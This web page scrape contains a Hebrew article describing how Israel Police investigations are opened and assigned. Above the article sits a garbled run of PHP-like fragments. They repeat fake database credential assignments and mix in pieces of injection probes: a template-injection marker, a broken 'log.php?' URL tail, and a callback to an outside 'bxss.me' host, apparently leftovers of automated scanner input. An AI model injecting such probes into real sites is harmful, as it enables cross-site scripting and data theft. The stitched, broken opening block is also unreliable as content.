$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>
משטרת ישראל מופקדת על אכיפת החוק ובטחון הפנים במדינת ישראל. סמכות המשטרה לפעול כאחת מזרועות האכיפה נגזרת מפקודת המשטרה המפרטת את היעוד, הסמכות והתפקידים שעיקרם: מניעת עבירות וגילוין, תפיסת עבריינים והבאתם לדין, קיום הסדר הציבורי וביטחון הנפש והרכוש ושמירה על האסירים המרצים עונשם בבתי המעצר והכלא.
חקירות המשטרה מנוהלות ומפוקחות על ידי אגף חקירות ומודיעין. בראש האגף עומד קצין בדרגת ניצב.
החקירות במשטרת ישראל נפתחות בדרך כלל בעקבות הגשת תלונה על ידי קורבן עבירה או בעל עניין אחר. כל אזרח רשאי לפנות לתחנת המשטרה הקרובה למקום מגוריו ולהגיש את התלונה. לאחר הגשתה נבחנת התלונה על ידי הגורמים המקצועיים בתחנה ושם מתקבלת החלטה אם קיימת עילה חוקית לפתוח בחקירה. אם מחליטים שכן, התלונה עוברת לטיפול היחידות הרלבנטיות לפי תחום התמחותן ומיקום ביצוע העבירות המיוחסות כעולה מכתב התלונה.
עבירות קלות נחקרות בדרך כלל על ידי החוקרים בתחנות המקומיות. עבירות חמורות מסוג פשע כגון: סחר בסמים, התפרצויות, תקיפות, שוד, רצח וגרימת חבלות חמורות יחקרו על ידי צוות חקירה מיוחד שהוקם במרחב או על ידי היחידות המרכזיות הכפופות למפקדי המחוזות השונים.
כאשר מדובר על חקירות של עובדי ציבור ופשיעה בינלאומית החקירות מועברות לטיפול היחידות הארציות, הכפופות ישירות לראש אגף חקירות ומודיעין. עבירות תנועה, תאונות עם נפגעים, פגע וברח יחקרו על ידי מחלקת החקירות המסונפת לאגף התנועה במטה הארצי.
החקירות לא נפתחות תמיד בגין הגשת תלונה רשמית. לפי החוק, אם נודע למשטרה על ביצוע עבירה או על כוונה לבצע פשע, מחובתה להפעיל את כל האמצעים המודיעיניים והחקירתיים העומדים לרשותה כדי למנוע את הפשע ולחקור את מתכנניו ומבצעיו.
המידע המעלה חשד לביצוע עבירות פליליות יכול שימצא בכתבת תחקיר בכלי התקשורת ו/או בדוח מבקר המדינה. אם מתברר למבקר שממצאי הביקורת מעלים חשד לביצוע עבירות פליליות הוא יעביר הממצאים לידיעת היועץ המשפטי לממשלה וזה יחליט לאחר בחינת החומר אם להעביר להמשך חקירת משטרה או לא.
מפלגי המודיעין בכל אחת מיחידות החקירה השונות אמונים על איסוף שיטתי ומזדמן של מידע ממקורות גלויים וחסויים לפי תוכנית איסוף תקופתית שמוגדרת על ידי האגף.
אם מתקבל מידע שעל פניו מעלה חשד לביצוע עבירות פליליות, רכזי המודיעין וקציני האיסוף וההערכה, יפעילו את המקורות והאמצעים להעשרת האיסוף עד להבשלתו לצורך פתיחה בחקירה גלויה. בלא מעט מקרים, איסוף המידע המתמשך לא מקים תשתית שיש בה לפתוח בהליכי חקירה ומעצר כנגד החשודים, כמתחייב מהוראות הפרוצדורה הפלילית.
עם השנים למד הציבור לדעת כי המשטרה "אוהבת" לבצע חקירות להן יש רוח גבית מצד כלי התקשורת השונים. בדרך כלל מדובר בחקירות של אישי ציבור בכירים או של פשיעה אלימה במיוחד, שלה השלכות חברתיות בעלות משמעות עמוקה. בתיקים מסוג זה, הפרקליטות מלווה את היחידות והצוותים החוקרים, מנחה אותם בהיבט החוקי ובהשלמות הנדרשות לצורך גיבוש כתב אישום שיעמוד במבחן בתי המשפט וירשיע את הנאשמים.